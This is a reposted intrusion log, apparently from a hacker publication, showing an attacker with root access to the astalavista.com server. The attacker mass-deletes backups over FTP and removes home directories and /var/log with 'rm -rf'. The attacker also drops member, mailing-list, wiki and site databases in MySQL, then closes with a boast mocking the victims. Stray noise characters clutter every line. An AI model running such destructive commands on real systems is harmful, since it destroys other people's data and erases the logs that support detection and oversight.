2 C3 \ u. l2 J* t: R/ s0 M# bftp> cd astalavista.com$ P6 Q3 q5 a ]3 I) E+ h
250 CWD command successful.
. Q o- k* L1 W' C: Hftp> ls -la
0 Y& h# w7 Z5 f# L227 Entering Passive Mode (212,254,194,163,2,189). `2 O- }+ H5 R, V3 Y
150 Opening BINARY mode data connection for ‘file list’.+ o( h. w7 W8 ]+ ]2 k) a
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar- y" L& M4 I+ Y0 Y! k% H
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2/ ?+ G |/ ?. s" x3 B5 x. e; R
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2: X* k( p$ p# D1 A+ L7 z
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar. Y( y+ I2 L+ _6 y7 h2 ]
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
2 s; W8 z- G3 F4 A, Y% c* ^) P$ p[snip]- [3 C8 O$ E- v8 @
226 Transfer complete., ~9 N) H4 B' L( U" A) f+ h
ftp> mdelete *
# M; ?' z' H/ Q' V& b$ Kftp> ls -la
$ M- k: K* x9 P227 Entering Passive Mode (212,254,194,163,2,193)5 H( x- W: s+ }+ C7 g" M% A5 Y
150 Opening BINARY mode data connection for ‘file list’.7 ]% t }6 G) j% c- }: F
226 Transfer complete.( R% W- v5 ^$ D# N
ftp>
- t5 ?3 z/ u/ D6 Y) G- U3 x6 [# [ C( E. @; C2 R. ^) x3 e
sh-3.2# cd /home. t* e! |! f/ P$ \/ ^# v8 w
sh-3.2# ls -la
$ D+ V- n; o+ ?% a& [6 e9 U# }* vtotal 120
# d3 `0 Q% n+ d# }3 C- d4 gdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
0 Z, ?* ]/ f- }7 B% vdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..4 N5 T2 E( Q( c
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
4 z8 @. c2 j7 J9 t8 C-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
2 M- u7 d1 D6 K-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
4 h( k' H- T- R P; vdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet# k8 y- N! h3 K [. }3 v
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
4 A% ?( Q2 g1 c3 Bdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
" \8 d& _, T$ U6 D! C, I% ndrwx–x–x 10 com com 4096 Apr 28 12:40 com
4 k' G J+ L2 x' ^drwxr-xr-x 2 root root 4096 May 17 2007 ftp F, p: Q( J. w( w
drwx—— 3 jon jon 4096 Sep 21 2007 jon
3 ?4 g# H" l0 B4 x0 v. X- Y2 O1 Bdrwx—— 2 root root 16384 Sep 11 2007 lost+found/ Y! \. [, U7 i2 P& F7 ?0 [
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
5 f2 u- U5 _5 M+ ]drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata# l6 O+ I" v. f7 H4 J% a6 h
drwx—— 2 jon jon 4096 Sep 15 2007 test. B5 }+ z4 }) \$ W$ f% v, F- p' C6 y5 C9 n
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
1 b. A8 x2 i' _% y( `6 ?/ \1 P9 ? Y" y1 I& F0 t
sh-3.2# rm -rf backup/
3 K8 o0 ?3 O0 U1 ^' Esh-3.2# rm -rf backup.14161/# m: h8 B2 C& f8 _ c- Z
sh-3.2# rm -rf ftp/; m" b$ S \$ D. i9 n
sh-3.2# rm -rf jon/3 f+ p; ]: z+ m. F. }0 Q1 J7 ~
sh-3.2# rm -rf my/
+ k: V8 l6 m7 {* {8 a* S5 N# ~sh-3.2# rm -rf mysqldata/" s p5 Y- l4 @2 G2 u
sh-3.2# rm -rf test/6 \" S2 d- Z# v$ e& Q
sh-3.2# rm -rf tmp/
3 }: L1 X# Q. [sh-3.2# cd ~
: Q. C5 ~0 c1 e& K/ h7 d9 _sh-3.2# rm -rf *6 @; Q5 B! K7 z5 j+ u
sh-3.2# rm -rf /var/log/
8 G6 t, B/ ~' s. V+ ]3 brm: cannot remove directory `/var/log//proftpd’: Directory not empty/ V$ _8 Z3 c& C( v
sh-3.2# rm -rf /home/*
* j [% I5 D% o9 t+ Fsh-3.2# mysql5 |6 g( J# D @2 {7 g! A
Welcome to the MySQL monitor. Commands end with ; or \g.. w: S" ]6 \0 D: q# B0 u5 R1 e
Your MySQL connection id is 407156
& ~9 \2 T6 B1 U5 g* ?' z* FServer version: 5.0.45-community-log MySQL Community Edition (GPL)
# D, i/ ]/ e7 ?( n
7 y4 a. x, Y- i, g8 f9 Q$ R1 RType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer. o2 V) g, I% I2 u: |# M, r. q" I
6 [8 K0 R/ a6 zmysql> show databases;+ V1 S7 F8 x& S }) V+ ^( F; a
+———————–+6 O0 Y3 Y; {% V1 q: f* O
| Database |
$ r! H+ R8 A1 N* o! ^$ e2 d; g; R+———————–+
|2 K, Z3 e' ~) r| information_schema |7 v/ j* ~/ i* S" W
| astanet_ads |
0 D1 O& I4 k a+ S6 M# ~/ X) X- c| astanet_mailing_lists |# y0 p5 r' i, _: ^7 I) F% |
| astanet_mediawiki |
' `) x8 t5 K$ e( g; ?5 _| astanet_membersystem |9 {1 v# c- i" t/ {( O/ V
| com_contrexx |& H3 M: O5 A; z6 V
| com_contrexx2 |
* i/ e' g" e, u- `5 i5 M| com_contrexx2_live |
+ k( s- |' T" {# D' L6 R: b| da_roundcube |& x- c( `, q! Y. B
| dolphin |& H3 L$ h( Z+ K) f/ F/ i: B
| ideapool |( j- D% j5 R! q# N) u2 p
| mysql |
% f4 d$ C7 P! r+ I5 u, A| test |
2 L: R$ P2 B/ |% C- E| yourmaster |
: }# @8 @7 ^% B; P4 W" E+———————–+" o# K; u3 j y1 r6 V V
14 rows in set (0.03 sec)) l( Z2 s( Z5 o1 {6 V
3 \* m/ K, D7 @ }mysql> drop database astanet_membersystem;1 Q% i/ `6 i! Y. n
droQuery OK, 46 rows affected (0.81 sec)
2 O, p. ]* h/ f/ A: F- c5 X/ R; D7 {4 s9 X+ u" V/ P
mysql> drop database com_contrexx;
, u# ?! b3 q, t& _- u/ t/ jQuery OK, 211 rows affected (2.72 sec)$ V; u# y ~% j! R; O
2 @/ B% n+ F# [" umysql> drop database com_contrexx2;+ y0 k6 f+ ?. [4 i( L
Query OK, 237 rows affected (2.23 sec)* U0 ]( [5 O8 \0 O B: K2 _. |
: T5 x/ Q4 w5 U5 Y4 U7 p. M# Hmysql> drop database com_contrexx2_live;" L C# w0 y, _
Query OK, 227 rows affected (7.63 sec)4 X6 x% W r2 d. w M' g* O
0 c, ^% T( H7 B+ ~
mysql> drop database ideapool;& d! z0 B# I4 ^( h$ r# V* m; ^
Query OK, 69 rows affected (0.19 sec). ]& V# Z. ^: C% w" x! b; {
& r5 q* N2 J2 n Z4 [mysql> drop database yourmaster;
% A/ {1 E6 i6 i. g2 y0 x* C4 ]Query OK, 158 rows affected (0.55 sec)
' |% v) c8 M- _7 \ S. h) f/ {2 W
mysql> drop database astanet_ads;5 ?9 H5 }5 p; ~1 h( _* [; R( C
Query OK, 9 rows affected (0.11 sec)
; l. z5 @' c* ?# C/ z' A/ H& |- V& H" C- G
mysql> drop database astanet_mailing_lists;7 r4 ~# A5 Z @" Q9 q$ z! Q+ Y; z
Query OK, 24 rows affected (1.47 sec): p4 \6 `& x R+ w t A
1 I6 G) e- e& a9 q
mysql> drop database astanet_mediawiki;
+ K) U! M0 S# R4 T( oQuery OK, 31 rows affected (0.51 sec)0 v+ o1 y' r7 m' U) @) Q) c5 ~
7 d* {0 S5 I2 M; z
mysql> show databases;2 S$ m8 ~7 ^9 {1 C2 _2 L5 b4 {
+——————–+
9 j8 ~% K p2 L( w" I7 H6 i| Database |
( D. c" _4 P q3 u) ^9 U. b+——————–+
$ @' g# J6 X5 P( U6 \+ N( k$ u| information_schema |- I: C! c+ ^6 h2 m& h
| da_roundcube |8 D8 r4 `1 ^1 q! E2 P- O% }
| dolphin |( Y0 \( S- [1 Q. p, x
| mysql |
4 S& g: ?* X2 O0 M7 B# }) K| test |
6 G9 X5 ~! P1 L# S: {6 K. d+——————–+7 `) ^5 x7 i- w& h8 h
5 rows in set (0.00 sec)7 O$ o' I+ H; H; ?* A. X. M
' a o( y4 j3 v9 {5 V J" e
What a journey! We’re not sure exactly why the “Terminator” had any influence on
# X" Z7 q. v6 u1 ?/ p( G" Atheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the L! f* n: c- R) J, X
wrong to say this pack of morons *wont be back*.8 v2 }/ F. C7 V! I
|
发表于 2012-11-6 21:07:34
收藏
支持
反对